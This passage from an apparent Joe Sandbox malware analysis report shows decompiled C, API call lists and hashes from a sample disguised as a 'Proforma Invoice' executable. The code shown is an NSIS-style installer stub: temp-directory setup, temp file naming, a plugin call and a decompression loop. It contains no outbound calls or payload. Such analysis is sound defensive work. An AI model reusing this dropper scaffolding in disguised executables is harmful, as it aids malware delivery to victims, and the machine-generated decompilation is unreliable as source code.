								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405B66("C:\\Users\\jones\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}

0x004015b3
0x004015ba
0x004015bd
0x004015c2
0x004015c6
0x004015c8
0x004015d0
0x004015d6
0x004015d8
0x004015db
0x004015e3
0x004015f0
0x004015fd
0x004015fd
0x004015f2
0x004015f3
0x004015fb
0x00000000
0x00000000
0x004015fb
0x004015f0
0x00401600
0x00401603
0x00401605
0x00401606
0x004015c8
0x0040160d
0x0040162d
0x00402164
0x0040160f
0x00401611
0x0040161c
0x00401622
0x00401622
0x0040288e
0x0040289a

APIs

Part of subcall function 004056ED: CharNextA.USER32(0040549F,?,004218A8,00000000,00405751,004218A8,004218A8,?,?,73BCF560,0040549F,?,"C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" ,73BCF560), ref: 004056FB
Part of subcall function 004056ED: CharNextA.USER32(00000000), ref: 00405700
Part of subcall function 004056ED: CharNextA.USER32(00000000), ref: 0040570F

CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401617

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 3751793516-47812868
Opcode ID: 79158bb1b9e0f9446a8291b1140989ad94052719e68ebd3d846b01836d69eb3e
Instruction ID: c38907cd9fbddcdb820990ab727de55d75fa8bca08f123d111df4852c942a759
Opcode Fuzzy Hash: 79158bb1b9e0f9446a8291b1140989ad94052719e68ebd3d846b01836d69eb3e
Instruction Fuzzy Hash: 7E010431D08141AFDB216F751D4497F27B0AA56369728073FF891B22E2C63C0942962E

Uniqueness

Uniqueness Score: -1.00%

Function 0040586C, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040586C(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}

0x00405870
0x00405876
0x00405877
0x00405877
0x00405878
0x0040587f
0x00405889
0x00405896
0x00405899
0x004058a1
0x00000000
0x00000000
0x004058a5
0x00000000
0x00000000
0x004058a7
0x00000000
0x004058a7
0x00000000

APIs

GetTickCount.KERNEL32 ref: 0040587F
GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405899

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040586C, 0040586F
"C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" , xrefs: 00405873
nsa, xrefs: 00405878

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" $C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-1161724781
Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction ID: 7bdb262dbebad2fb51735791196b4a750b565e3ebaa120aaaad2cbe3184e43fd
Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
Instruction Fuzzy Hash: B1F0A73734820876E7105E55DC04B9B7F9DDF91760F14C027FE44DA1C0D6B49954C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 6F7316DB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E6F7316DB(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v88;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x6f73405c = _a8;
				 *0x6f734060 = _a16;
				 *0x6f734064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x6f734038, E6F731556);
				_push(1); // executed
				_t37 = E6F731A98(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E6F7322AF(_t54);
					}
					E6F7322F1(_t67, _t54);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x810) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_t37 = E6F7324D8(_t54);
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x818; // 0x818
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E6F73156B(_t54,  &_v88);
								 *(_t54 + 0x834) =  *(_t54 + 0x834) & 0x00000000;
								_t18 = _t54 + 0x818; // 0x818
								_t72 = _t18;
								 *((intOrPtr*)(_t54 + 0x820)) = _t42;
								 *_t72 = 3;
								E6F7324D8(_t54);
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							E6F7324D8(_t54);
							_t37 = GlobalFree(E6F731266(E6F731559(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E6F73249E(_t54);
							if(( *(_t54 + 0x810) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x808);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x810) & 0x00000020) != 0) {
								_t37 = E6F7314E2( *0x6f734058);
							}
						}
						if(( *(_t54 + 0x810) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E6F732CC3(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E6F732A38(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E6F7326B2(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x6f7316db
0x6f7316db
0x6f7316db
0x6f7316e5
0x6f7316ed
0x6f7316fa
0x6f731708
0x6f73170b
0x6f73170d
0x6f731712
0x6f731717
0x6f731836
0x6f731836
0x6f73171d
0x6f731721
0x6f731724
0x6f731729
0x6f73172b
0x6f731731
0x6f731737
0x6f731767
0x6f73176e
0x6f731792
0x6f7317dd
0x6f731794
0x6f731794
0x6f731795
0x6f73179b
0x6f73179c
0x6f7317a6
0x6f7317a9
0x6f7317ae
0x6f7317b5
0x6f7317b5
0x6f7317bc
0x6f7317c2
0x6f7317c8
0x6f7317d5
0x6f7317d6
0x6f7317d9
0x6f731770
0x6f731771
0x6f731786
0x6f731786
0x6f7317e7
0x6f7317ea
0x6f7317f7
0x6f7317fe
0x6f731806
0x6f731809
0x6f731809
0x6f731806
0x6f731816
0x6f73181e
0x6f731823
0x6f731816
0x6f73182b
0x00000000
0x6f73182d
0x00000000
0x6f73182e
0x6f73182b
0x6f73173b
0x6f73173e
0x6f73175c
0x00000000
0x00000000
0x6f73175f
0x6f731764
0x6f731764
0x6f731766
0x00000000
0x6f731766
0x6f731740
0x6f731741
0x6f731749
0x6f73174a
0x00000000
0x6f73174a
0x6f731743
0x6f731744
0x6f731752
0x00000000
0x6f731752
0x6f731747
0x00000000
0x00000000
0x00000000
0x6f731747

APIs

Part of subcall function 6F731A98: GlobalFree.KERNEL32 ref: 6F731D09
Part of subcall function 6F731A98: GlobalFree.KERNEL32 ref: 6F731D0E
Part of subcall function 6F731A98: GlobalFree.KERNEL32 ref: 6F731D13

GlobalFree.KERNEL32 ref: 6F731786
FreeLibrary.KERNEL32(?), ref: 6F731809
GlobalFree.KERNEL32 ref: 6F73182E

Part of subcall function 6F7322AF: GlobalAlloc.KERNEL32(00000040,?), ref: 6F7322E0

Part of subcall function 6F7326B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6F731757,00000000), ref: 6F732782

Part of subcall function 6F73156B: wsprintfA.USER32 ref: 6F731599

Strings

, xrefs: 6F73180F

Memory Dump Source

Source File: 00000000.00000002.658919807.000000006F731000.00000020.00020000.sdmp, Offset: 6F730000, based on PE: true

Associated: 00000000.00000002.658908947.000000006F730000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.658929430.000000006F733000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.658938298.000000006F735000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f730000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: b999b705c6feb0292afe34c3f4f76685320ecede4ae6c687f87a6debeef4d32f
Instruction ID: de6b97eca77e03e636fefafec3f14d5c016d797756a23c9c5e382a13c475ca3f
Opcode Fuzzy Hash: b999b705c6feb0292afe34c3f4f76685320ecede4ae6c687f87a6debeef4d32f
Instruction Fuzzy Hash: A4418073D00328BACB109F749FC8BD537E8BF09325F088476E9159A093DBB5A455C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00403208, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00403208(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
				E00405DC8(_t6);
				_t2 = E004056C6(_t6);
				if(_t2 != 0) {
					E00405659(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E0040586C("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}

0x00403209
0x0040320f
0x00403215
0x0040321c
0x00403221
0x00403229
0x00403235
0x0040323b
0x0040321f
0x0040321f
0x0040321f

APIs

Part of subcall function 00405DC8: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E20
Part of subcall function 00405DC8: CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
Part of subcall function 00405DC8: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E32
Part of subcall function 00405DC8: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E42

CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00403229

Strings

1033, xrefs: 00403230
C:\Users\user\AppData\Local\Temp\, xrefs: 00403209, 0040320E, 00403214, 00403220, 00403228, 0040322F

Memory Dump Source

Source File: 00000000.00000002.654566906.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.654562439.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654579328.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654593443.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654640904.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654653307.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654659682.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 4115351271-517883005
Opcode ID: 6efbcda31fdcc81e1bc9b7455ac61b895c89039b7b6caaf7bbff9198608db7ec
Instruction ID: 28437e5e833f6c5712a3d87292ca06883de7807d6adf700678bf42288e0e849f
Opcode Fuzzy Hash: 6efbcda31fdcc81e1bc9b7455ac61b895c89039b7b6caaf7bbff9198608db7ec
Instruction Fuzzy Hash: 11D0C922656E3032C651363A3C0AFDF091C8F5271AF55847BF908B40D64B6C5A5259EF

Uniqueness

Uniqueness Score: -1.00%

Function 00406566, Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 99%

			E00406566() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004069D4))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
